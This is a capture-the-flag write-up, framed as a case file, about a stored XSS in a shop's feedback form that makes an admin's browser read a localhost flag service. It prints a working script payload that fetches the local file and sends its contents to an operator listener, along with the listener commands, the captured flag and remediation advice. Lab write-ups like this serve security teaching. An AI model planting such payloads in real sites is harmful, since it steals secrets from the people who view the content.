Case file

Stored feedback XSS to admin browser reading local flag service

Foundations web engagement: customer feedback was rendered in the staff browser on the same host that listened on :8080/flag.txt; a stored XSS payload coerced the admin context to fetch and exfiltrate the secret.

Foundations16 minXSS · Web Security · Browser Exploitation
  • Feedback form lacked output encoding; admin reviewed submissions from the shop workstation; XSS fetched http://127.0.0.1:8080/flag.txt and posted contents to the operator listener.

  • Planted payload in feedback; admin view triggered fetch of :8080/flag.txt to operator webhook.

01

Engagement summary

Feedback form lacked output encoding; admin reviewed submissions from the shop workstation; XSS fetched http://127.0.0.1:8080/flag.txt and posted contents to the operator listener.

THE STICKER SHOP ran its public storefront and staff tooling on one workstation. Flag material sat on a localhost HTTP listener at :8080/flag.txt — unreachable from the engagement network, reachable from the admin browser. Customer feedback was accepted and later opened by that same browser without sanitization. Submitting a script tag that XHR/fetched 127.0.0.1:8080/flag.txt and beaconed the body to an external collector executed in the admin’s origin/context when staff reviewed the queue. Classic same-host operational failure: browsing untrusted input on the machine that holds local-only secrets.

Business impact

Localhost services that skip auth assume a trusted browser. Stored XSS turns every review session into an SSRF-capable footwork plane against 127.0.0.1. Separate review workstations from production secrets; sandbox feedback rendering; protect local admin ports with auth even on loopback.

02

Feedback XSS and localhost flag fetch

Planted payload in feedback; admin view triggered fetch of :8080/flag.txt to operator webhook.

STORED XSS

feedback-payload.html

<script>
fetch('http://127.0.0.1:8080/flag.txt')
  .then(r => r.text())
  .then(t => fetch('http://10.9.0.54:8000/?c=' + encodeURIComponent(t)));
</script>

OPERATOR · XSS

savvy@lab:~$ curl -s http://10.10.10.10/ | grep -i feedback

feedback form → POST /submit

savvy@lab:~$ python3 -m http.server 8000

listening for admin beacon...

savvy@lab:~$ # submit feedback-payload.html via shop form

GET /?c=THM%7B83789a69074f636f64a38879cfcabe8b62305ee6%7D

Remediation

Context-encode all user HTML; deploy CSP that blocks inline script. Move flag/admin APIs off the browsing workstation or require auth on loopback. Staff should review untrusted content in an isolated VDI without routes to sensitive local ports.